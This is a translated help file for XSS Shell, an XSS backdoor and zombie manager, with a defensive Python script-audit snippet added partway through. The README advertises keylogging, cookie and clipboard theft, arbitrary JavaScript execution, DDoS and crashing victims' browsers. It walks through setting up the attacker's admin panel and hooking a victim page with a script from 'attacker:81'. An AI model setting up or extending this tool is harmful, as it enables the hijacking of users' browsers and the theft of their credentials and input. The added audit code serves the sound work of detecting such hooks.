
XSS Shell Help File Translation (original translation by xym5366)

2013-11-08 

-------------------------
XSS SHELL v0.3.8
-------------------------
Ferruh Mavituna - Last Updated : 02/11/2006

-------------------------
WHAT IS XSS SHELL?
-------------------------
XSS Shell is a powerful XSS backdoor and zombie manager. This concept was first presented by "XSS-Proxy - http://xss-proxy.sourceforge.net/". Normally in XSS attacks the attacker has one shot; in XSS Shell you can interactively send requests and get responses from the victim. You can backdoor the page.

You can steal basic auth, you can bypass IP restrictions in administration panels, you can DDoS some systems with a permanent XSS vulnerability, etc. Attack possibilities are limited only by ideas. Basically this tool demonstrates that you can do more with XSS.

-------------------------
LICENSE
-------------------------
GNU, check xssshell.asp for details.

-------------------------
FEATURES
-------------------------
XSS Shell has several features to gain whole access over the victim. You can also simply add your own commands.

Most of the features can be enabled or disabled from configuration or can be tweaked in the source code.

Features;
 - Regenerating Pages
  - This is one of the key and advanced features of XSS Shell. XSS Shell re-renders the infected page and keeps the user in a virtual environment. Thus even if the user clicks any links in the infected page, he or she will still be under control! (within cross-domain restrictions) In normal XSS attacks, when the user leaves the page you can't do anything.
  - Secondly, this feature keeps the session open, so even if the victim follows an outside link from the infected page, the session is not going to time out and you will still be in charge.

 - Keylogger
 - Mouse Logger (click points + current DOM)

Built-in Commands;
 - Get Keylogger Data
 - Get Current Page (Current rendered DOM / like screenshot)
 - Get Cookie
 - Execute supplied JavaScript (eval)
 - Get Clipboard (IE only)
 - Get internal IP address (Firefox + JVM only)
 - Check victim's visited URL history
 - DDoS
 - Force to crash victim's browser

-------------------------
INSTALL
-------------------------
XSS Shell uses ASP + MS Access database as backend, but you can simply port them into any other server-side solution. You just need to stick with the simple communication protocol.

Install Admin Interface;
1. Copy "xssshell" folder into your web server
2. Copy "db" to a secure place (below root)
3. Configure "database path" from "xssshell/db.asp"
4. Modify hard coded password in db.asp [default password is : w00t]
5. Now you can access admin interface from something like http://[YOURHOST]/xssshell/


Configure XSS Shell for communication;
1. Open xssshell.asp
2. Set "SERVER" variable to where your XSSShell folder is located, i.e.: "http://[YOURHOST]/xssshell/";
3. Be sure to check "ME", "CONNECTOR", "COMMANDS_URL" variables. If you changed filenames, folder names or have some kind of different configuration, you need to modify them.

Now open your admin interface from your browser. To test it, just modify the "sample_victim/default.asp" source code and replace the "http://attacker:81/release/xssshell.js" URL with your own XSS Shell URL. Open the "sample_victim" folder in some other browser, and maybe upload it to some other server.

Now you should see a zombie in the admin interface. Just write something into the "parameters" textarea and click "alert()". You should see an alert message in the victim's browser.

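The test setup above hooks a page by making it load a script from another host, so a site owner can look for that on their own pages. The following is an added example, not part of the original README or of XSS Shell: it lists every script a page loads from an origin outside an allowlist and marks the file names this README mentions. The page URL, CDN host and sample HTML are constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

# File names taken from this README; a renamed copy will not match them.
KNOWN_NAMES = ("xssshell.js", "xssshell.asp")
DEFAULT_PORTS = {"http": 80, "https": 443}

def origin(url):
    """Return (scheme, host, port) with default ports made explicit."""
    parts = urlsplit(url)
    scheme = parts.scheme.lower()
    host = (parts.hostname or "").lower()
    return (scheme, host, parts.port or DEFAULT_PORTS.get(scheme))

class ScriptSrcCollector(HTMLParser):
    """Collects the src attribute of every <script> tag."""
    def __init__(self):
        super().__init__()
        self.sources = []

    def handle_starttag(self, tag, attrs):
        # HTMLParser lower-cases tag and attribute names for us.
        src = dict(attrs).get("src") if tag == "script" else None
        if src:
            self.sources.append(src.strip())

def audit_scripts(page_url, html, allowed_origins=()):
    """List external scripts loaded from origins outside the allowlist."""
    allowed = {origin(page_url)} | {origin(o) for o in allowed_origins}
    collector = ScriptSrcCollector()
    collector.feed(html)
    findings = []
    for src in collector.sources:
        absolute = urljoin(page_url, src)  # resolves relative and //host forms
        if origin(absolute) in allowed:
            continue
        name = urlsplit(absolute).path.rsplit("/", 1)[-1].lower()
        findings.append({"src": absolute, "known_name": name in KNOWN_NAMES})
    return findings

# Constructed sample page; the third include mirrors the README's test URL.
SAMPLE = """<html><body>
<script src="/js/site.js"></script>
<script src="//cdn.example.com/lib.js"></script>
<SCRIPT SRC="http://attacker:81/release/xssshell.js"></SCRIPT>
</body></html>"""

if __name__ == "__main__":
    for finding in audit_scripts("https://shop.example.com/item?id=1",
                                 SAMPLE, ["https://cdn.example.com"]):
        print(finding)
```

The origin check is the reliable signal; the file-name match only catches an unmodified copy, and an inline injected script has no src attribute for this check to see.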
-------------------------
SECURITY NOTES
-------------------------
- As a hunter, be careful about possible "Backfire" in getSelfHTML(). Someone can hack you back or track you by another XSS or XSS Shell attack.
 - Check out "showdata.asp" and implement your own "filter()" function to make it safer for you.

- Put "On error resume next" in db.asp; better, modify your web server to not show any errors.
